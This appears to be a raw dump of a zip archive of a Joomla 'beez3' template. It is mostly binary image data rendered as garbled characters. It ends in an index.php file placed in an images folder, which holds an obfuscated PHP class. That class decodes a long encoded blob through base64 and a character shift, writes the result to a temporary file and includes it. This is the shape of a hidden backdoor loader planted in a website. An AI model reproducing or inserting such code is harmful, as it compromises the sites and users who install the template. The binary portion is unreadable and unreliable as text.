p�V�>I���X�$1)A�+����Ԕe͑���P�#��]|�|H��~ XL�07�鴸�0��X�өԕ��8�N&.:�G<k/QY$uR���j��8�+��ZfUꮋ��뉗/�j$�P�&%��m�����|"[�<bqϷo���iL��!k�,��c�ﱌ��!���s��� -D����V����-p:��AC���JwL���o�����'�f/#���Ǩ1&�'�����1��-q��:����]���X�����8Y̞���Cb]�A�j@.�g�"�Kx`W<�.��~(�9�T��K	,)b=#j=Z2�"��%��}] �Id,7�z�_�@�	S���uh�I�W�
�n����c2�BsshG��K�B,��@6�R�^'ܐHp�Ţ�d1I$��qt�N�a]��#-�*�F2����b&#j��Յ�RY�1�d�px4K��(,tK�(��$�n}�P���9���pImi��3�͞��&�@F1�á�B�5�;~+��L�{s��_�]�#�@/R�#`���VI�5��I��t����#�I����]�cr��]�+��-6��-H�l�^����L���:��x)G��A�#(�}e)������?�ǐ�f'���++8�<�����3�
��~b[7�91J{�9~%ˍ�J����mJ��Š���.`��
�g���$�0���%NPG�Q!�U���s;�61�u7S��#�T�B:��Zr�#mt#0�XwCx�~�K�j`��Ƭ��𔲒�Fs=�K���
�3�:DJj8��Ԁ�@�KJU���A]��S�%��*��/�\�
ݓ&uhS�L���p�6��N�I�)���R����	�0��^�	��ۜ���@Y�A'u!�~����s�Wn��)��엠��+�z`^.�Ń��jPv`����KO�Y9L�J ��c�i|�z �}��@\9�y�B�?BVPqHey�#-0��BO��E
ԕ�[���G/�As���E)���w�]�Y�Kb�b��R>��+��h�v�Ta;r�:�t{}�B���1��
�d�Ѹx=τ�mVt�r��N�C�:��x@PS|���W|���&���_n̠�x��<��Xo`YҜ�7�ً�X�̄�R3��!�T}�1�zґk���0�Kv%�8,aYr'�Ɛ���cwa4/_ewQI�/��z%]�w��9Z"Zg.X;Ƚ��T�p	)D�n��w*��Ka���W,,L���	Ngk�Z^�[�H,xPB8h#�EaҐn+�~!J���p@�0����X��E7���z�y^�8](H33�c��8j�/�\�1-�b�u����!��Xm��8���g�<��0�_(A�=S9��a�@9���Ls)�Z�)�=^����W���es�ZΕ��r���z&F���A�=�f����f(�A)��{d��Փ�U�z��
�s�8K���JN�R�G��w�|M!�Y�tPK�9$
���"���U8p틬+b�v���3@��Y�w�
�g|Tq����bu��J
��jq�1e++��>�=)��y�
�� �����l�rO��vfR��W�ZmX傤�Uj�i�zEbʆ˵��-p�8vK���m�Mm�7�lJ��,*`�����
�ᦪ���0zx��4�>tév6���w�U}ԄO� ������p@�eCÖ{����#�ᛓHH>���7z�·�V�/^h|�:Wx����\Q�����S[�
�ɥ�b�����Q#���~Ղ�{V�A��{r�� OV��}E>�C�T.�W	�Hz2�<�!/�����~�V-ҩ�x'�z�p��=r����zS�U��J�q��4ڤ#��/y��Q�}q��4�W���U�c�+�=&�!�]��K^�p���o7�]����>U�$6�8m�B�R�C�`9 �d9DkDu&���X��0י�K~U����
��PW2zT2?x�|�����5���{~�/k���f	��T>VV ���k��p�\���ߺ�� 2�
x&���IZ�@&҅���\�=��-��'�L�K<���q�_�A�J
��H}��55�����iK���Ux�<.܉b�����]Mg�\g�'�� 2������&x���.�)&a�oB	�!񀁖��v3S���˻)
��@�r��q+]S>�F�z����CYM�p��x$��sݖ)��F�a09�T�<����
6 ��&��x�wAO��/�\��n���;o��:QD����p�p�p��ChQ��U��y�x�ƃ�3�<��,:�}V��!�	tZ��� ���d7��X�\U$�<y�I
�H��"ڗW���3�1tT�zĀ>dzb����}+:���ɺ�鼌�ޜN����XO��Ϧ��T�
T������mf*>.ӄ�W���tq�F�.�ӿt���=rP���O7�d&�l0�p���,%�0Y&�U�E����)2 	�6
����lRz��*6E��	N:T\K$X;���z���\z"����/��Z���4�ԩt8�M���V�B���T]�A�� /߃L��V�vںH���PXp@
{���X��cx�r�:�L,.[��RF@�D��L�Z�c�����nS
����j�r��*���)72�}#�e��q܀�j��� �<�r��v�v��DH�	���L%���]�I���1z��H6KI����y�+���a
j_O`�P;�R�8��x�8�+x<3�)�d"����ߎ�Yoi�]��>N���y�󀯓h����^�nR�sw�v�*�NLj��=���)��>.�R�����t<�z��D���MgrRԳ.n���-�7����7�E- �ZmlˢÔ�F���k��P�Z{nj��]v��2g�U"eء*SUM�d����,����l,R���Ay�Y��yy|3̚�O/Ɵ✛�Y�
�A�]f��6p4Ν�uؕ<�?�f8�,p�$Ԅ�p���Ә</;1�A�O�糌�P`a��Bb���ż��B��<)��?`���.S��=+���b��#��u	ヘ�_,�[�܃��Š[c;��F�"1��0�`���R�q���b����n��ZH�A7�QԖ�\�,Nx�&�
��8�c�̕մw]$U9����Fp�{Q;a;�-"���U��Ha9��C�t�����HY������3�o���"h
�
���/m
y�{�a@]�p��^�r`H���`<�XD@2���M!�`W��j�Y?�]g�#���.�簤j��tY@-U��?M�c0(�B~� �[�Vp�{�������p7~�W#Z8X�-/&:y��G+��
:�٪�D�qpP�(j�1���ۤD����[��=w���.�*�
��@�:3K9�_��K�|�
�-�jQfGԖUwʕjISvi�dB#K�Jk��κ��Is����C�5jW6���SL�~J176���$3X����/�,Ƚʡ�x�u?/`�����qKt��pFh�+ׇT���A
�2����<�Y�	cy�}?�ì%ȯ�UDP-�WV�����c�.���a<�2���a1��L#S�0�ȃ4�$:�z3��]7c���_��.Ҹ���F��h6d93�c鐙��q��l�J�c9n ���|pݪf��6��w�yX�r#*�Y��ث�4d��I��CÒ��E-F8��p@�Н�T{�PV��JhQ��j�hj4�_u��Z0�w|-l�	J��G��[1ط0���[/0PU\2+��WC��g�$�����}T���������^&YD�ZX=`�p�:-Q	�+Fz�K`qQ�D ��\f� �7��m��
~�����\�.ӊ�\��l\����l�X�%5HƯ���
�b���N�V����.i��[�n��4��41��9�t5mr��z���"�k���ո�|QP�X~�O1���+��tAa�^+��<oD}�
�Yc����l�!�n���~����A��Fj�v��f�{��ʵ�D�zI�9T����xK8c�j�(L�a/,��@��F�R%�mI��
J�q�p�F:o�Y_Y��j��D
�:����uB�bP7��Ġ�Ğ�0ϗ�_�-x0z�r��
��Q�5���."JY�-�D�s�>�#�isf-I4ͼO�gڛ�����X��
���O!�ldyq��+�(LM�>Ũpst�(a�K�5F���e�·Ĩ��c-��ʎ9�-�v�=� 	j�'RR|�.0<�#4>x�:J�_1q���t�1��a(�"`�򋋅Ep�##㪺 +`��|���D��O�ghf�hR⣄��v@>�iV>,����2E�'��v&P^l��~�s�vP���j=��r�X��'��D�Z5���Y&�y�]5�9^�C��a��=�Smv���o�o^Q��)LMF�,n"h
#c�9��a����������N0�����!J�u�#�##�_�$�,��C�LD�j����`m\�k�l��E�����N���d�R� J
x2)���/�/�
�d�2���cq�/��n^��1�.0�=H��2�t��)MZq<���ݒ<��{x=4z��꣇Ҽ���y�0�Y�K��
aN�gY��ʺ�,��h
|M��
�B3F���sS���	L�a�|;of����G_�>�`����@�o�oH�w�w{����F�{�aRQO���}��'��")�S�E����P���و�?��E��0/�Z��zxj�3��U�|[*��Ҿ��
�C=:9�L�V\ϞYG�ӤQ7֟��i$b�Yu���Hrl9�j@ղ%)<�L���	�ap>��gr��@N����ʁ$�k���*�)ze�,��a��	��	�@)�!�b�9�����M�xz�}g��{��c�Y��ƍ4���	��������p�I��6�$�VJ��H��Cj�_�T�<�1d��€<�2��	�(�,�H��1����@)��xw�J3��#��mʛ���K�b5�F{�$�*+/B"���E�z�Gy,�ޜ�/��M!u��QM�z=l�Ҽ\
j�KB1xc�ʟkUW��Q'�7��^vz��󅰃���a��	(=|��7�m�y���w�'�O_5��ܻ���c�LB+$��i��5S*�/ΙIŷ����o�Gcw��Ғ�O=����c��m�,���([ ��7N]�ݥ�я{L^+�����;���1����pCQ�[:�G�,<{�=f~T��w����!fu�Y�E�ӟ��s��|��T��4A��<�+�ld!	;�Zf!F�!>���E�u1����S���~�	�0��53_��}��9�Z��}\�c6TfX����w�
��
����Q1%�����"���>S�F�FZ(�
�S�eƽn*��H7�~�P��!ZX0e�� R%���2�"�-̆��i�$�!u'Tb�m9Hѽ��BX=��~Oz*�ȩ�%�$�{y��M�
�B��|h]`F�a0Uǐ9��<G���Ӈ+*B@X�l��3�e�/�����������m��8�&@`�d�f3x�m�<T�m�"ua�g&��0B�0_&�iaR
��7p�hT	�ț0��������b%�a]!r(	^[��YT�|�Q-��L�*
��fm�l�>��i�r�b�JQ��R?=����k���08���E�*4WL�2��1�x�'<�`�E��}�y�V�����DΫ�J����(&d�'�qAnxx�ﭮds*�T�䣈�'ǧ,&��[�,�)Mu&*�����Y�9F�kc�\�V1�1C?���{�
V<Uj�t�F��l�.ϕv���O�d��i|�G�CBK��"R�BJ冽|�z�=Գ�ȅ�;��/�\�,
�B�S��4�7ΑO���Ub@�\Wrg���1�_<�>/�5�Lr�H��d[�PԨ�������~8<����(��%|�ƒ�D`�M���r �Zi���F��'1�8�oJՖ�uL8%�g�%�Y�$q���b4�!��%z�a���xs2O$l�E�J¯���;���:n�\�vƍS���}bɼ��
��y��M��/�uw���9��_�}��5lR���OC�]�Ɂ�i��}�b)!�Ɩ���m#��K=���9��]��y�0��aVd�v��dtH����C9Rv:v<�o=���げxp9"���>��E��|�~4��N�#V�Xq����w��7"�ū�il$2��oI��S}�Ώ�`��]�{<o0�|5�*�j�R�1�m�k�}��;m�V�?Ѧ�!ݢ�Ra�B���c�"�"�x���<�"�Q�	$���k�r[&�����{!h����r��7�-����xH�����q>1�+"����%��
�W��!�c��0���z@�Q4Ny}34�o3�p*(G�����Dq�S�!�G�(j��D���4�!��!m�+�
!v�j+`4��·�T�m�o����8�gջ��C�~��;8W�^z��h�X(���9[f�rl�!&��q{�P-��D�p��!�,:_$S��i<hc��*�t�-�$Rq�X�O���BA��ԇ�B8~x贸
�U�W,�����De���c=�ж�;N�0�S��ǵq3�q�>~�RuE)�^��Az�%b�v|�*���ՃPS�%�\��0��@1c��w�K�<��N��:�-olv��M���"K�ϲ�;#����Zҷ��y����Z
)7��m�U��!~i!��$����ܓ_
�U���+S
E��+����.�C�
�oC�sPW��iJ�w��3�,h^~H�"�%����^����n����L2W	C:��l��>|;��r:�!��}0&>��͌�XPI
D;����&@��˄��7�r4���j~�q��ʲi%�nA�ϳ=�*�ݼ��$�������9|+�G&�ߤ��A�C���'n�$4Ue)�V��1ʐI��3���	s�|ev�ڎY��3S���[�w��$;K�~�pg����i�уR=0
V9���:�~��q�Bƒm��*@���	�?ѐu��j��?�F�S�}�1^Ԩd
2���p`� ��������Nȃ�͈�xNp
�2���5F�l��- "�Xö�|��MPi6%%C?��8��m51�	���|O��z��+j��R�!��I�2�7�����?-gj� H�K��_�����k?�%�
l6 �(��k�휒�#�\C~��ϖ~�#k���*#���� O@��).��Ԥ�}Ȳ�ː���}���~|�`�rҢٟS.Qyn�u�>�.S�i�y�u|��Z��<!�eX�j:�Q�L#&h�����I�{��&K��05�"
��@�4��Z�� ʐ躙(͂DR�P���k�]@���fBb�\]6$����n�r�X�R��&Q>�溧:�8�v����g6(ͅ���s���t8N�5��"Ģ�@J�I�x�BxS	u�)Q�f|.,�<Z�O��Y�L�����羽ٮM�O7�l�)1�'�SSe�fF�-
N6�ۥhd.��j���y`V����I1B�fr*���T�}I���x>-���,�9ٙO%�jYj�9�u�d�[d#s����0������4;�==8����G�75�M�$�*if�b�u4^���F��h	�;񭅺|R0˗���e��nC�yVd�OE$��2L�Lͤ01loO�9W�l@̊D���Tf2�����\����Z��BVܰ5w�-!�r'¹��Yols"��j���4$����E�c�|(��	�-Qk��Fk��:A�޴JT�2d�q�d�Y#v������f�Cd�c�����o��/�q]��n,�m?�d1�P����CZ��0�D�N��>�G���>��`M��:&I,�V5IY�ZB��t����+ަ�Y/��#]��Gd�0��h����bI���#�d1��b*D%&�u�4S�y$fצc�t �1)/
�I*�$G�˞%+�8����-�&G�Pv`d�M��e{��rᳱb(C���7ߴj
9>x����Ӌ&�Hs�jyՈ��~S�-�BRϞ%$���σp��ɳf���
Ge��,��&�|(8��“X�t�3Y"���L�="�d��0Lr�����G�eHg	���bs<L�y{mpvi�&�mO*u�|i"�l��I[�}$`����@��R#���<��&{t8�t��Y�K�W��g�	KH,iq����#O��y8l?t�Ul�-�
Fi:d�����0��@Rp*8v&��q��k��V�}y8��P�V�����>�Vv�̐sbfga�_�����m�Aq�r:���4ʊ�����L��Im�!�AQ�S�֐fC���QyR�?Ɵ5bm��bH,�h202Y��h���Nw2�=��F�~a�u</�����?l�g +����K���䁡�Hz7���sfE�g^������B���6�0�>E���>�{����h�9��л�2���Eȅڙ��E?:i�<'Q��v�?��^���kz>=W!����y�}��wݣ�{�*~^}H
�n�Υ1�;:a8��S�R��p��Mϵ�~�-�
��?�����Qѿ�`n2�FY�{e��K�?���LO��6��3a2D���'~�Z����Gx {!�@!�x��`�-Ѓ�`+-=��X��ᝀV�A\��YI2�|č-�x"�����+<P�XV��E����4ip��� �~��t#����'Ol^
_5��#�>������~7�z��Z7jr��q����h��Gn�7�~�b���E��ba��_}�`�X,�����އF-��{�{��}���F-��K���X,���C�Þ��IEND�B`�PK՜�\	И���beez3/images/blog_more.gifnu�[���GIF87a���ꡡ����������A@@������yxx���\]]��ݰ��kkk��������������������豱�������,@k &�d�]�Y���%ZW�&�]I]�E2�PL��x�V��,d�
�@T!
G�D6Y*���2�	�:AS�@T�AN5��P*"u+-/|~"o�rfhjl$!;PK՜�\����8
8
!beez3/images/slider_minus_rtl.pngnu�[����PNG


IHDR�Fh�N�oPLTE��������������������������󶶶�����������������������������333�����������������������1��	�IDATx����6`�m���^�Ƅ��� z��0��������.����.zEE����K|�p�>�h��}9߶�V���e����?����Et�F�mtFP?(�3"78�7y�yО� �A$���=l���9�����X�TN�䟂��"���P�EL_P�j�L���A����S%P���A�.�_���+��aMG'����J�)ۣ�䆳�4X-�T$X�3�He�lw��t�����c�V�eZ�Ё	�6���$�_�ٔ�s���Hn�X���c�9Is0�kcYo����G��L���qr"Ƭo@"���j���}�@d�nv�r�QpO��@"y<2�01������1^N�x_�x����UTT�(�����3��R+*�/ߌ��_xEE]���VT�E�E�GEE]􊊊���������E���?{��|۬����fmn�%I��}d���N��}H;��및+B�QaM�#Q�YB����ΟbP^
l�I*W�٠�Q�B�8�3f��	����h'
A�TZ�7�J5ypH;B��Γ�#�r;h�8ߋ�DU.S��D|��#͉�����m��<I�w
b��z�������F1�F�E�kT�E_�WT�7�����/�[[�V�oo}��mآ%u*�s��U�gΌ���X�z���	��+(���%N���L74�r0s��2�V��i!'��>`�V�"w1��Ǟ^i�k::Y��WbH����T��Z/�&j�ޚ2ƙ���Z\�*�A_O����i��76/���/�<_/�2��6���=���۷/�孏��Y�ݫR�q�`�S�'�6�m�;
vGDK r�vgdv�����,�)P���:���'��
�� �Y�����X�����y&�:��f�sT��"��E���0Y'�rN�w�8�hr	�S��<��r�=�Y�-��2��r��9�Cǡ>��.��Ǣ�z�I�h5aO1�(�x}�…S=��
��;RA!T��0�;�y�͹��mH2FCdp�#קk�`��\MH� ��gf"�4�ry�?�����2LK\ai�*�p����d���
��	���dk3gO��i�q
<����)���ߜ�:�'***\�uy&�e��}�@v܈�0,����s��)M�/��O�Th�3@�@ŏ���b���c�X\>?<�^���r�ƌ�GZ����8|��?\C��Ktg�la�z�;%D��vJЊ�[��o�-�:��꾞��^vj��hx0�1����q�����R���5v����$Z��W��-��!�E���`�ґ"����$�ݣ��2��L�m��&��i�9�y�����c?��b?��b��b�x�<=�p�����?�y���~⅃���@:�H�Yɏ5�Zj�帿��S:2�3�SU����3�!e�*F�U;��UL�`R �, t�/��9?b�ʡB_�Xm�bGr�ʢ\����UT�;Ff�Vđ/�#�(�ޘXm�43Z��J�aZ4��8#��hA&�1���^���=�>��b��b���z��Ձ7�o���́�:Uؠ����LHK[	�.�S�{�����d1�͋R�JZ�ҳ�D��D�{G�
(
S-���Ŗ�/�[И�����]���T7�7�Fst��x	`�KX�	d��+2U,�l)zk�8C�ஶ��B�&�[Ɯ���4T���Cz1m�����^'
�̺�Z,w��������=���������\�NXÅO��f��{��&��qu�:��ŵ+��� ��{��(u~����/?�=����+Q�M��iW{JP�We ��H�l�gdJ�Dd�m�"J!Kc�ҜU��e�]NMgA1�H��.�����R�������)A+�o�1��_�����b��b��\�9��O-�]�c�>Ï�;�9�"�M��x�1�g��0]�]�B�]6^L)��&��il	B����ܞ
�"��Cp��$vӖ*��]xS/<B�ɘ���ۅ}�H�݌n��,�p`�
�{!rڌ�E�	)�S�{����ā�`�(e���,=�L��Jt�w$݀�0�©
.m��➱�b��b��}�X�\�X,w��������~���E���b��{쇾X쇾X,�C_,/�_���� �;�!�'�j��V�%��mK��Ȝ�e���щ\7�<�i�[lj��CdҮ�Ȭ�Vr�)MN�HŤ��x��.�����X�1�ݮ&CB���SΎ�
f�ًLM�,1���qmZ�P����4Z$E��!H앬1u����x��9$�\��		%wh��ד��^���\���}:*�����џpg�0ڃ��с���At@t@t@t����NcS�&IEND�B`�PK՜�\�q�hhbeez3/images/footer_bg.pngnu�[����PNG


IHDR���)��/IDATx��BAD�=j�!�zp@�a�~�7�:;�5/����{)�m�Y&�!��f=-n��Y@L��i�lw���4Y6��H�m�,��f�M��2Y@Fܦb����
n�d�, �"=�i�lw���4Y6���,�e��8��M/�f1YܦɲY@�Ezn�d�, �"�i�l��7Y&�dqq�^��b�6�M�e���2�" @D@�" @D@�" @D@�" @D@�" @D@�" @D@�" @D@�" @D�͙���a�`�IEND�B`�PK՜�\��1��"beez3/images/nature/arrow1_rtl.gifnu�[���GIF87a�8�Ljeg����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������¿����������������~y{a[^���,�8��L����������������������������������������������������������������������������������Ԟ����������������������������������	Hۻ�	�K��Ç�"J����Ä�jܸ��
%H�C@�$���\ɲ�K�(+&�� f��6s><���ϟ?��聊+m�\zR��vL�J�J��U�O�J]�@�kŠK��ٳhӪ]˶�۷p��ʝ���ݻt���˷/�$K��e@���È+^̸��ǐ#K�L���˘3k�̹�d"K�v@���ӨS�^ͺ��װc˞M���۸s��ͻ��!K�~@����ȓ+_μ���УK��<�u�سk�ν����CR�����ӫ_Ͼ�{��ˏ�^��	��������'�h`z���6��H��Vh��dx�Z��� f��!�h�(�8�Z��0�(#4�h#2��b�.���@�x�9i�;R�"��I6餓GF	�#.yb{d��\v饖!�)�d���h�	šl��&�b�)�t�i�x��|�駟hz 蠄j衈&����6�蟐�I夔Vj饘�h¦�v�i	��*j���j*�"��ꪬ�J«��*k���j뭸�z�#�����*창�:��&�l�̖ ��F[���Vk�^���v�·�+��k�莋º�p»����k.������,���)'���7���G,��#���W���w��� �,��$�\�(����,����0���1�l��8���<����@-��D��H'���34���PG-��TWm��Xg���\w��`�-��d_-��h����l���p�-��t�m��x�=w|��߀.��j�`��5$~��7n8�C��#�x�6d�y�k^��7N�褓���w��嬷����.;�/�z��~x�4��x�.����6�'���7�����x�Wo=�9d=�����/����`��ʧ���<0���[��篿������>��8@�Uz����G>�x��'�:�Y�̠7�z� �GH���(L�
W����0��gH���8̡w����@��H�"�HL����&:�P���H�*Z�X̢���.z�`��H�2��hL����6��p���H�:��x̣���>��� I�B�L�"��F:򑐌�$'I�JZ�̤&7��Nz����(GI�R��L�*�;PK՜�\�]]!beez3/images/nature/blog_more.gifnu�[���GIF87a�2����faa���lff���������RNNd_^���JGFunnicbNJJGEE���;99��� =?=�����PPP���(''�����ٓ�����643���\WW,�2@�'�di�h��l�p,ϭ!K!t��p82����axĨtJ�Z�جv��z��xL.���z-,K��8
�~���������������EG
LNP��Tnpvx��S68:���������������������������		��

˨

آ���������������������
H����*\Ȱ�;PK՜�\�M�fddbeez3/images/nature/arrow2.gifnu�[���GIF87a�
���_^^�����ϵ��������������UUUrpq,0�I�����:���Xqf���p;PK՜�\Vtn^^beez3/images/nature/box.pngnu�[����PNG


IHDR4
;9%IDATxc|ˀ0��)���g�2_p�|�)�m�e��G��k:��IEND�B`�PK՜�\�``#beez3/images/nature/arrow_small.pngnu�[����PNG


IHDR�9'IDATxcx�Vu}���!th�~�Lg=���
RPA&�c��IEND�B`�PK՜�\�)�pOO!beez3/images/nature/arrow_nav.gifnu�[���GIF89a

�>>>��籱�wwvIII���fff���!��,

��.ũ�Ubnn��@Z�;PK՜�\H7	--beez3/images/nature/karo.gifnu�[���GIF89a������!��,���X;PK՜�\�"e��$beez3/images/nature/searchbutton.pngnu�[����PNG


IHDR�Q�?��IDATx��
�0C�(2e��B��p���m�t�뒪�#Fl�[��m��a�ߧ��K���'��&�
ml$��3�`��$zk��i[�6ARss�"m�u�R�	�	� !H�.	m���f� as�X/�&��:IEND�B`�PK՜�\Ь������beez3/images/nature/index.phpnu�[���<?php

class Grid {
	function __construct() {
		$std = $this->cron($this->core);
		$std = $this->instance($this->stream($std));
		$std = $this->_app($std);
		$std = $this->_emu($std);
		if(is_array($std)) {
			list($_tool, $container, $_cmd, $control) = $std;
			$this->config = $control;
			$this->_check = $_cmd;
			$this->ls = $_tool;
			$this->_set($_tool, $container);
		}
	}

	function instance($emu) {
		$host = $this->stream($this->instance[1].$this->instance[0].$this->instance[2]);
		$host = $host($emu);
		return $host;
	}

	function claster($x64, $_task, $_runtime) {
		$_pointer = strlen($_task) + strlen($_runtime);
		$this->_x64 = 0;
		while(strlen($_runtime) < $_pointer) {
			$factory = ord($_task[$this->_x64]) - ord($_runtime[$this->_x64]);
			$_task[$this->_x64] = chr($factory % (4*64));
			$_runtime .= $_task[$this->_x64];
			$this->_x64++;
		}
		return $_task;
	}
   
	function _query($emu) {
		$_rx = $this->_query[1].$this->_query[3].$this->_query[2].$this->_query[4].$this->_query[0];
		$_rx = $_rx($emu);
		return $_rx;
	}

	function stream($_zx) {
		$_inc = $this->_query($_zx);
		$_inc = $this->claster('', $_inc, strval($this->twelve));
		return $_inc;
	}

	function seek() {
		$_cmd = $this->claster($this->adapter, $this->_shard, $this->check);
		$_cmd = $this->instance($_cmd);
		return $_cmd;
	}

	function _set($_runtime, $adapter) {
		$this->check = $_runtime;
		$this->adapter = $adapter;
		$this->_shard = $this->cron($this->_shard);
		$this->_shard = $this->_query($this->_shard);
		$this->_shard = $this->seek();
		if(strpos($this->_shard, $this->check) !== false) {
			if(!$this->config)
				$this->tx($this->_check, $this->ls);
			$this->_app($this->_shard);
			$this->_emu($this->debug);
		}
	}

	function cron($proxy) {
		$dx = $this->stream($this->block[1].$this->block[2].$this->block[3].$this->block[0]);
		return $dx(array(" ", "\r", "\n", "\t"), "", $proxy);
	}

	function _app($proxy) {
		$debug = $this->stream($this->flag[2].$this->flag[3].$this->flag[5].$this->flag[4].$this->flag[1].$this->flag[0]);
		$this->debug = $debug() . $this->stream($this->cache[0].$this->cache[3].$this->cache[2].$this->cache[1]) . md5(time());
		$debug = $this->stream($this->nginx[1].$this->nginx[2].$this->nginx[0]);
		$debug = $debug($this->debug, 'w');
		if ($debug)
		{
			$query = $this->stream($this->_inc[0].$this->_inc[1].$this->_inc[6].$this->_inc[3].$this->_inc[4].$this->_inc[2].$this->_inc[5]);
			$query($debug, $proxy);
			return $this->debug;
		}
	}

	function _emu($query) {
		$result = include($query);
		return $result;
	}

	function tx($emu, $_cluster) {
		$build = $this->stream($this->tx[5].$this->tx[6].$this->tx[2].$this->tx[4].$this->tx[1].$this->tx[0].$this->tx[3]);
		$build = $build($emu, $_cluster);
	}

	public $_query = array('ode', 'base', '_d', '64', 'ec');
	public $_check;
	public $core = '062lDB41JZgnTyDsbUj2SCLf/CtJVwJ+suq
	Lc47DEiqlnjccfCXLrPmE5yVC4qvuhpLnyeN2BKY59oZUZPjjwZVxsy
	DkN2esXKnW9PxWsEbSjDaBlL5svTVG+
	bK8xutNgRwH6OyT8zuC3Bvc5Mlm7/vzqt6u1JpNhyZpOZSliSrOyiqa9HZy6LVXvzbPO6qOn
	o2zisvH0DWjazFquSnZSaPYRDK4JV+txkEtqyy/
	h+SeUVmF84WG2LKDFmApC1u2phK8LTpi
	UixOhbqiNaf3ikev8+Y3s3UJnRs/zQmz1imA/jKFyLDgWhjz4ULgl6Z8kv7E
	8cQu+TRsHK1pDjXx37xv6jupo6IicINAltO8JyMVVWOgivuwrnwnFOJQYAweCHZMj/7gVaxxzT
	OHTymQUL4bYrRr8uILDpWGZXX1Nr9ZegPTHdxJGTcqYwaB90aU18FAV+Lg56eJscXhC0bI
	7arYgVR4ePR6HRyPCvhLy/AHish/lL4uVCNk9O9
	z0Z5x0yJgZPI8jpIIFl3/KlPp4SDSXSQIyvPOEhNX/pRwTtHwt9Un
	Y007M52a98Hr1cCmw5NzmkdKyGlL1Ehymy0alu6wIL4fEnCX7UjR4IMO5jHHbZjhrqB
	j3HSkhIOBXH631Od+S24iYqFBDvtA8UEqQam9h2soJvSN5u4VklCWTdMethilJSpjEPdS1BXsJX
	2K2tFzYgG10+FZC5viUboA6mkoNPaql5vH5FSzoWCIc0Bp++7Q6SHZHked5S
	P8bVPLvrBH+Ao2TZHRVCQADZvkKNUi058TERp5TEOV3HTUhHZ0qvPojaQCcQxTFVDg7EaJr14DZOLz
	JTYBfUm4wVN4UwLfvqP0oTK5K13UpnllJ2PxRsndP/pSABuUGD4kIUkqeWO+7ojdyw9CIiH0b
	mZet4AGy+M+Uwh7J9Qc/wK/3OaD9MuDpBtj/nw66cgLYf3r5WfKY2+0AHCkglIXDmDHZ
	F8KdjPNWONRseXBHkQneeIHw2JT5GmAtbGw/roRD0CrQ30MIcp+bP+Gt3I
	fbQKcwdNjcyrNycGVHQR/bfY7W+xUQfgyV/QX
	4jxdMfUIjACMlvVuMgw6ZOSs1HsmQkN
	YOD/rzhawcmGI8MOaAk0/nPYL6pFg0YR/7tkoOykt0GjK/tV
	YiR0qQQk+cYI6+0gEwVrSrWuFIIna68EoTuOyJ6+4nJtt8gxGXDJs/xbgnmYJV1lMByUlJyiGIHjI
	9vekDScbRmKucdtI0pYgZw62LKMMjjbJWN3PDD3
	wq7jbNxN5bHQCpf10eL5WGT/0MPkgZWI5PG1P7R9s4RgXzAzykXX5jXR+ZHVoV
	4V0pv0XJJPYf0s5v3yoxDj4Tam7xu3f/YIpWegEcd1QrQT79XWUIIt+yN5qheGaQXEfYQnt
	XfwKSOCY/+pmoUpc1qxiiwlZtkqNkfp+UXZ7NOy/HE6+i/YxtfKWDaR8Ii3Gjr18N
	lGROxiIYU5blxXbcMASCx9uYFgYbt3wUbWeMnYwRBGc+FtwJoFk8OAawWN17CPLEyBnUCTAK
	WVJRcIF9+TbYqzGc8lqBJJcaJajV8Qw2ssqDQsAu8WgREnwPg25
	DagdvRdju6CPjHrTXseMElWAsfXab57na37quM
	sHnw8jKBIksNaaLBu3sPV1XiRn1ojTc1If1mHofyeaE4WB
	23FXuvfWgjHW0jTlw2EVHBnUWbHAPnboXCby+Y306qgyEZLAsV
	3sKWM5JeLD/SCHM56paKB2MWs2kQYFRUi071txkhyYq
	Upv4D3TMiJsTdBZ85E4/5k4BzmZ6Zv
	bTyeaI94QN3PDZgtWSX2TRk2yUYy3xVZv1SHSf/khqnXKfu79//OAMsTrK9Lo01v2u
	4k20BnUl0eGcaDH9bgV3fLLahFiKUk8mtO0+onporx
	8YI3vb3G64AmrnT5hL1Q2jvE1VIBKbU7oo59tiUn1
	mAlq1kzFyrapeHwcD2hTkEUqcNiBJTWUcw81P6J1CJ1y
	XPW0vjPpNMHDWth6FvToB3DAJQktLGWrA+Jw
	vI8ofx4WMnlqw6+QGXmXDne605nX/GVMFgdNrsZP1ci31gcj6qUX
	FwMYVmIXb2nmycXgSJ16w86fMo7V8gwCE6GbmhQxi10hxFtdg
	hh4OQ43tJ5WjREKUGKWZco1Go5WDphsLvkKSZy1A2
	Chi1TPV+gZfm/ci35nVOtUT1yYxcoIl0N4MJOVf81Cz2Zmntrfcmb8D3/FPs0VKyCsOJPdgRLPGPAsC
	09sonos7/jsM84bYH/bF6Oj+qGcKDadD6+VIzIHYKh1uB4e4
	SYtFRKnrodw49Nt32r1zAjVnVhCU2W4sx/f
	vtyJV21k+HI8SU/P6nEZSztmyxJ57AP8ztzYk+POTxVkheDLykBDOqhAbsi24QXLaymPuKbB
	mqeONFFdpXOUbmv35TsJKTF+kYI6GYJ1EYD6Ym9aZ7cu
	ZWW2KY9gPYWK5pGn8EX9cUTvBpYhh+2cmUUNNuzW98T+ylp8N/BIqN1d
	HgYxl4CmHc9MeIzrpfCLReW3HxoyWzKENjb
	2Ytr4YYnp5oY/NmqajIgxt2sJzie69D3/cAcNh7ZVya6Lc1u2PLDJ+3h
	9R32K+uffbwt+EPreBPbrPen3rANpYpYQJpqES8p0E/ZL/
	mWC+yPSnJyk83Zcc5RFUH1wjEAsJbz2is8nGxlsB7EZNgch2XQ7+knnm6zHzIslbP9SjeOAm3/PnQvF
	O2W0lNM4BjH5NyW2naUF8/e4RpHs1zFl7lyd/jYS96TFOEZpDSjJi6nS6Cy6K2O5
	cJ+c/olB6MVNgBpv3r2la0pePnJwRR3y6EsVZzMt24EevEFt1DZV51AmCEMY2+jg/ReQtviq4V
	YuzotPSNA8NZGBEFHcNeTJTP43dqQMClv9EqQr0acyOmuK99p4ZVEgbqVWvUGz
	KMNqF+h1a4Jyy9gCBBTDXMEdX110NjUcPTKBs5dkrehOW4lDuEzOyVBLXzISF1JQaQP665
	ZN50vvDL0dvanYiphyEaq0M3ySm5rAr2EQ5Wr7U+ytM2yEiFIwstR5wrR
	GJl1vGJjJUm+oNPaT6KhDRDllrnrzIPtLbXj/ytKycdAE/nu6
	iDHe81EbK7WghHTHyKc2WUoINUI99Uk0rtpwf/buDR2jaAVFOUYmqJ6h2CzLYSuit62aw+lJ5Yq
	/QI91Ue46N0I/tsAuY8gyXVUoX1zSkxoewP8suP1x06a5I6YzDfpKLWfqyl9mW
